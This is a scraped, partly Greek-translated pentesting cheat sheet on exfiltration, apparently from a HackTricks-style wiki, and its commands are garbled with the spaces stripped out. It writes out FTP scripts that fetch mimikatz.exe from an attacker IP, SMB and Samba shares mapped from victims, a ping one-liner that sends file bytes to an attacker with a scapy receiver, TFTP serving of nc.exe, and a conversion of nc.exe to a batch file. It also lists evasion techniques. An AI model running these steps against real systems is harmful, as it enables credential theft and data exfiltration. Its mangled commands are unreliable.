#Run the following script to configure the FTP server#!/bin/bashgroupaddftpgroupuseradd-gftpgroup-d/dev/null-s/etcftpuserpure-pwduseraddfusr-uftpuser-d/ftphomepure-pwmkdbcd/etc/pure-ftpd/auth/ln-s../conf/PureDB60pdbmkdir-p/ftphomechown-Rftpuser:ftpgroup/ftphome//etc/init.d/pure-ftpdrestart
Πελάτης Windows
#Work well with python. With pure-ftp use fusr:ftpechoopen10.11.0.4121>ftp.txtechoUSERanonymous>>ftp.txtechoanonymous>>ftp.txtechobin>>ftp.txtechoGETmimikatz.exe>>ftp.txtechobye>>ftp.txtftp-n-v-s:ftp.txt
SMB
Κάλι ως διακομιστής
kali_op1>impacket-smbserver-smb2supportkali`pwd`# Share current directorykali_op2>smbserver.py-smb2supportname/path/folder# Share a folder#For new Win10 versionsimpacket-smbserver-smb2support-usertest-passwordtesttest`pwd`
Ή δημιουργήστε ένα smb share χρησιμοποιώντας το samba:
apt-getinstallsambamkdir/tmp/smbchmod777/tmp/smb#Add to the end of /etc/samba/smb.conf this:[public]comment=SambaonUbuntupath=/tmp/smbreadonly=nobrowsable=yesguestok=Yes#Start sambaservicesmbdrestart
Exfiltration
Techniques
Data Compression: Compress data before exfiltration to reduce size and avoid detection.
Data Encryption: Encrypt data before exfiltration to protect it from unauthorized access.
Data Fragmentation: Break data into smaller fragments for exfiltration to evade detection.
Data Hiding: Hide exfiltrated data within other files or protocols to avoid detection.
Steganography: Conceal data within images, audio files, or other media to exfiltrate without detection.
Traffic Manipulation: Manipulate network traffic to disguise exfiltration as normal traffic.
DNS Tunneling: Use DNS protocol to exfiltrate data by encoding it within DNS queries and responses.
Exfiltration Over Alternative Protocols: Use non-standard protocols for exfiltration to bypass detection mechanisms.
Exfiltration Over Encrypted Channels: Use encrypted channels for exfiltration to avoid detection by network monitoring tools.
Tools
Netcat: A versatile networking utility that can be used for exfiltration.
Curl: A command-line tool for transferring data with URL syntax that can be used for exfiltration.
Wget: A command-line utility for downloading files from the web that can be used for exfiltration.
FTP: File Transfer Protocol can be used for exfiltration of data.
SCP: Secure Copy Protocol can securely transfer files for exfiltration.
SFTP: Secure File Transfer Protocol can be used for secure exfiltration of files.
HTTP/HTTPS: Hypertext Transfer Protocol can be used for exfiltration over the web.
DNSCat2: A tool for exfiltration using DNS protocol.
Iodine: A tool for tunneling IP over DNS for exfiltration.
Dnscat2: Another tool for exfiltration using DNS protocol.
PowerShell Empire: A post-exploitation agent that can be used for exfiltration.
Mimikatz: A tool for extracting credentials from Windows machines that can aid in exfiltration.
PsExec: A command-line tool that can be used for executing processes on remote systems for exfiltration.
Bitsadmin: A command-line tool to create and monitor BITS jobs for exfiltration.
Certutil: A command-line program that can be used to dump and display certification authority (CA) configuration information.
WMIC: Windows Management Instrumentation Command-line can be used for exfiltration.
PowerShell: The Windows PowerShell can be used for various exfiltration techniques.
Windows Management Instrumentation (WMI): WMI can be used for exfiltration of data from Windows systems.
Windows Remote Management (WinRM): WinRM can be used for remote management and exfiltration on Windows systems.
CMD-Wind> \\10.10.14.14\path\to\exeCMD-Wind>netusez: \\10.10.14.14\test/user:testtest#For SMB using credentialsWindPS-1>New-PSDrive-Name"new_disk"-PSProvider"FileSystem"-Root"\\10.10.14.9\kali"WindPS-2>cdnew_disk:
SCP
Ο επιτιθέμενος πρέπει να έχει ενεργοποιημένο το SSHd.
# To exfiltrate the content of a file via pings you can do:xxd-p-c4/path/file/exfil|whilereadline; doping-c1-p $line <IPattacker>; done#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import*#This is ippsec receiver created in the HTB machine Mischiefdefprocess_packet(pkt):if pkt.haslayer(ICMP):if pkt[ICMP].type ==0:data = pkt[ICMP].load[-4:]#Read the 4bytes interestingprint(f"{data.decode('utf-8')}", flush=True, end="")sniff(iface="tun0", prn=process_packet)
SMTP
Εάν μπορείτε να στείλετε δεδομένα σε έναν διακομιστή SMTP, μπορείτε να δημιουργήσετε έναν SMTP για να λάβετε τα δεδομένα με τη χρήση της Python:
sudopython-msmtpd-n-cDebuggingServer:25
TFTP
Από προεπιλογή σε XP και 2003 (σε άλλα πρέπει να προστεθεί ρητά κατά την εγκατάσταση)
Στο Kali, ξεκινήστε τον διακομιστή TFTP:
#I didn't get this options working and I prefer the python optionmkdir/tftpatftpd--daemon--port69/tftpcp/path/tp/nc.exe/tftp
VBScript is a scripting language that is commonly used for Windows systems. It can be used for various purposes, including exfiltrating data from a compromised system. VBScript can be executed using the Windows Script Host (WSH) and can interact with the Windows operating system to perform tasks such as file operations, network communication, and data exfiltration.
Exfiltration Techniques
File Transfer
VBScript can be used to transfer files from a compromised system to an external server using protocols such as FTP or HTTP. By reading the contents of a file and sending it over the network, an attacker can exfiltrate sensitive data without being detected.
Data Encoding
To avoid detection by security controls, data exfiltrated using VBScript can be encoded using techniques such as Base64 encoding. This allows the data to be obfuscated during transit and decoded on the attacker's server.
Network Communication
VBScript can establish network connections to send data to remote servers controlled by an attacker. By leveraging network sockets, VBScript can communicate over TCP or UDP to exfiltrate data stealthily.
Detection and Prevention
Detecting VBScript-based exfiltration can be challenging due to its ability to blend in with legitimate scripting activities. Monitoring for suspicious network connections, file transfers, and unusual data encoding patterns can help in detecting potential exfiltration attempts. Restricting the use of VBScript and implementing application whitelisting can help prevent unauthorized scripts from running on Windows systems.
Το πρόγραμμα debug.exe όχι μόνο επιτρέπει την επιθεώρηση των δυαδικών αρχείων, αλλά έχει επίσης τη δυνατότητα να τα ξαναχτίσει από hex. Αυτό σημαίνει ότι παρέχοντας ένα hex ενός δυαδικού αρχείου, το debug.exe μπορεί να δημιουργήσει το δυαδικό αρχείο. Ωστόσο, είναι σημαντικό να σημειωθεί ότι το debug.exe έχει μια περιορισμένη δυνατότητα συναρμολόγησης αρχείων μέχρι 64 kb σε μέγεθος.
# Reduce the sizeupx-9nc.exewineexe2bat.exenc.exenc.txt